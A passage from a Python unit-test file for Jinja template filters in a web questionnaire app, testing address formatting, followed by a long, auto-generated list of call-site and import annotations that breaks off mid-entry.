self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_concatenated_list_no_values(self):
answer_address = ['', '', '']
metadata_address = ['', '', '']
with self.assertRaises(Exception) as error:
format_address_list(answer_address, metadata_address)
self.assertEqual('No valid address passed to format_address_list filter', error.exception.args[0])
| [((888, 5, 888, 53), 'unittest.mock.patch', 'patch', ({(888, 11, 888, 52): '"""app.jinja_filters.format_unordered_list"""'}, {}), "('app.jinja_filters.format_unordered_list')", False, 'from unittest.mock import patch\n'), ((27, 34, 27, 55), 'mock.Mock', 'Mock', (), '', False, 'from mock import Mock\n'), ((30, 55, 30, 81), 'mock.Mock', 'Mock', (), '', False, 'from mock import Mock\n'), ((45, 55, 45, 81), 'mock.Mock', 'Mock', (), '', False, 'from mock import Mock\n'), ((53, 55, 53, 81), 'mock.Mock', 'Mock', (), '', False, 'from mock import Mock\n'), ((64, 55, 64, 81), 'mock.Mock', 'Mock', (), '', False, 'from mock import Mock\n'), ((83, 23, 83, 82), 'app.jinja_filters.format_multilined_string', 'format_multilined_string', ({(83, 48, 83, 71): 'self.autoescape_context', (83, 73, 83, 81): 'new_line'}, {}), '(self.autoescape_context, new_line)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((92, 23, 93, 57), 'app.jinja_filters.format_multilined_string', 'format_multilined_string', ({(92, 48, 92, 71): 'self.autoescape_context', (93, 48, 93, 56): 'new_line'}, {}), '(self.autoescape_context, new_line)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((102, 23, 102, 82), 'app.jinja_filters.format_multilined_string', 'format_multilined_string', ({(102, 48, 102, 71): 'self.autoescape_context', (102, 73, 102, 81): 'new_line'}, {}), '(self.autoescape_context, new_line)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((111, 23, 112, 57), 'app.jinja_filters.format_multilined_string', 'format_multilined_string', ({(111, 48, 111, 71): 'self.autoescape_context', (112, 48, 112, 56): 'new_line'}, {}), '(self.autoescape_context, new_line)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((121, 23, 121, 82), 'app.jinja_filters.format_multilined_string', 'format_multilined_string', ({(121, 48, 121, 71): 'self.autoescape_context', (121, 73, 121, 81): 'new_line'}, {}), '(self.autoescape_context, new_line)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((130, 23, 130, 64), 'app.jinja_filters.get_current_date', 'get_current_date', ({(130, 40, 130, 63): 'self.autoescape_context'}, {}), '(self.autoescape_context)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((174, 23, 174, 65), 'app.jinja_filters.format_date', 'format_date', ({(174, 35, 174, 58): 'self.autoescape_context', (174, 60, 174, 64): 'date'}, {}), '(self.autoescape_context, date)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((184, 23, 184, 65), 'app.jinja_filters.format_date', 'format_date', ({(184, 35, 184, 58): 'self.autoescape_context', (184, 60, 184, 64): 'date'}, {}), '(self.autoescape_context, date)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((313, 23, 313, 57), 'app.jinja_filters.format_household_member_name', 'format_household_member_name', ({(313, 52, 313, 56): 'name'}, {}), '(name)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((322, 23, 322, 57), 'app.jinja_filters.format_household_member_name', 'format_household_member_name', ({(322, 52, 322, 56): 'name'}, {}), '(name)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((331, 23, 331, 57), 'app.jinja_filters.format_household_member_name', 'format_household_member_name', ({(331, 52, 331, 56): 'name'}, {}), '(name)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((340, 23, 340, 57), 'app.jinja_filters.format_household_member_name', 'format_household_member_name', ({(340, 52, 340, 56): 'name'}, {}), '(name)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((349, 23, 349, 57), 'app.jinja_filters.format_household_member_name', 'format_household_member_name', ({(349, 52, 349, 56): 'name'}, {}), '(name)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((358, 23, 358, 57), 'app.jinja_filters.format_household_member_name', 'format_household_member_name', ({(358, 52, 358, 56): 'name'}, {}), '(name)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((367, 23, 367, 57), 'app.jinja_filters.format_household_member_name', 'format_household_member_name', ({(367, 52, 367, 56): 'name'}, {}), '(name)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((376, 23, 376, 57), 'app.jinja_filters.format_household_member_name', 'format_household_member_name', ({(376, 52, 376, 56): 'name'}, {}), '(name)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((385, 23, 385, 57), 'app.jinja_filters.format_household_member_name', 'format_household_member_name', ({(385, 52, 385, 56): 'name'}, {}), '(name)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((394, 23, 394, 68), 'app.jinja_filters.format_household_member_name_possessive', 'format_household_member_name_possessive', ({(394, 63, 394, 67): 'name'}, {}), '(name)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((403, 23, 403, 68), 'app.jinja_filters.format_household_member_name_possessive', 'format_household_member_name_possessive', ({(403, 63, 403, 67): 'name'}, {}), '(name)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((412, 23, 412, 68), 'app.jinja_filters.format_household_member_name_possessive', 'format_household_member_name_possessive', ({(412, 63, 412, 67): 'name'}, {}), '(name)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((421, 23, 421, 52), 'app.jinja_filters.concatenated_list', 'concatenated_list', ({(421, 41, 421, 51): 'list_items'}, {}), '(list_items)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((430, 23, 430, 52), 'app.jinja_filters.concatenated_list', 'concatenated_list', ({(430, 41, 430, 51): 'list_items'}, {}), '(list_items)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((439, 23, 439, 52), 'app.jinja_filters.concatenated_list', 'concatenated_list', ({(439, 41, 439, 51): 'list_items'}, {}), '(list_items)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((454, 55, 454, 81), 'mock.Mock', 'Mock', (), '', False, 'from mock import Mock\n'), ((475, 55, 475, 78), 'mock.Mock', 'Mock', (), '', False, 'from mock import Mock\n'), ((482, 55, 482, 81), 'mock.Mock', 'Mock', (), '', False, 'from mock import Mock\n'), ((504, 55, 504, 78), 'mock.Mock', 'Mock', (), '', False, 'from mock import Mock\n'), ((535, 26, 535, 84), 'app.jinja_filters.format_unordered_list', 'format_unordered_list', ({(535, 48, 535, 71): 'self.autoescape_context', (535, 73, 535, 83): 'list_items'}, {}), '(self.autoescape_context, list_items)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((544, 26, 544, 84), 'app.jinja_filters.format_unordered_list', 'format_unordered_list', ({(544, 48, 544, 71): 'self.autoescape_context', (544, 73, 544, 83): 'list_items'}, {}), '(self.autoescape_context, list_items)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((551, 26, 551, 84), 'app.jinja_filters.format_unordered_list', 'format_unordered_list', ({(551, 48, 551, 71): 'self.autoescape_context', (551, 73, 551, 83): 'list_items'}, {}), '(self.autoescape_context, list_items)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((560, 21, 560, 41), 'app.jinja_filters.max_value', 'max_value', ({(560, 31, 560, 40): '*two_ints'}, {}), '(*two_ints)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((570, 21, 570, 40), 'app.jinja_filters.max_value', 'max_value', ({(570, 31, 570, 39): '*one_int'}, {}), '(*one_int)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((606, 21, 606, 37), 'app.jinja_filters.max_value', 'max_value', ({(606, 31, 606, 36): '*args'}, {}), '(*args)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((616, 21, 616, 40), 'app.jinja_filters.max_value', 'max_value', ({(616, 31, 616, 39): '*two_str'}, {}), '(*two_str)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((623, 14, 623, 31), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((628, 21, 628, 42), 'app.jinja_filters.max_value', 'max_value', ({(628, 31, 628, 41): '*two_dates'}, {}), '(*two_dates)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((638, 21, 638, 41), 'app.jinja_filters.min_value', 'min_value', ({(638, 31, 638, 40): '*two_ints'}, {}), '(*two_ints)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((648, 21, 648, 40), 'app.jinja_filters.min_value', 'min_value', ({(648, 31, 648, 39): '*one_int'}, {}), '(*one_int)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((684, 21, 684, 37), 'app.jinja_filters.min_value', 'min_value', ({(684, 31, 684, 36): '*args'}, {}), '(*args)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((694, 21, 694, 40), 'app.jinja_filters.min_value', 'min_value', ({(694, 31, 694, 39): '*two_str'}, {}), '(*two_str)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((701, 14, 701, 31), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((706, 21, 706, 42), 'app.jinja_filters.min_value', 'min_value', ({(706, 31, 706, 41): '*two_dates'}, {}), '(*two_dates)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((714, 18, 721, 9), 'types.SimpleNamespace', 'SimpleNamespace', (), '', False, 'from types import SimpleNamespace\n'), ((724, 16, 724, 56), 'app.jinja_filters.get_question_title', 'get_question_title', ({(724, 35, 724, 42): 'context', (724, 44, 724, 55): 'question_id'}, {}), '(context, question_id)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((732, 18, 743, 9), 'types.SimpleNamespace', 'SimpleNamespace', (), '', False, 'from types import SimpleNamespace\n'), ((746, 16, 746, 56), 'app.jinja_filters.get_question_title', 'get_question_title', ({(746, 35, 746, 42): 'context', (746, 44, 746, 55): 'question_id'}, {}), '(context, question_id)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((755, 18, 765, 9), 'types.SimpleNamespace', 'SimpleNamespace', (), '', False, 'from types import SimpleNamespace\n'), ((768, 23, 768, 72), 'app.jinja_filters.get_answer_label', 'get_answer_label', ({(768, 40, 768, 47): 'context', (768, 49, 768, 58): 'answer_id', (768, 60, 768, 71): 'question_id'}, {}), '(context, answer_id, question_id)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((777, 18, 787, 9), 'types.SimpleNamespace', 'SimpleNamespace', (), '', False, 'from types import SimpleNamespace\n'), ((790, 23, 790, 72), 'app.jinja_filters.get_answer_label', 'get_answer_label', ({(790, 40, 790, 47): 'context', (790, 49, 790, 58): 'answer_id', (790, 60, 790, 71): 'question_id'}, {}), '(context, answer_id, question_id)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((799, 18, 813, 9), 'types.SimpleNamespace', 'SimpleNamespace', (), '', False, 'from types import SimpleNamespace\n'), ((816, 23, 816, 72), 'app.jinja_filters.get_answer_label', 'get_answer_label', ({(816, 40, 816, 47): 'context', (816, 49, 816, 58): 'answer_id', (816, 60, 816, 71): 'question_id'}, {}), '(context, answer_id, question_id)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, 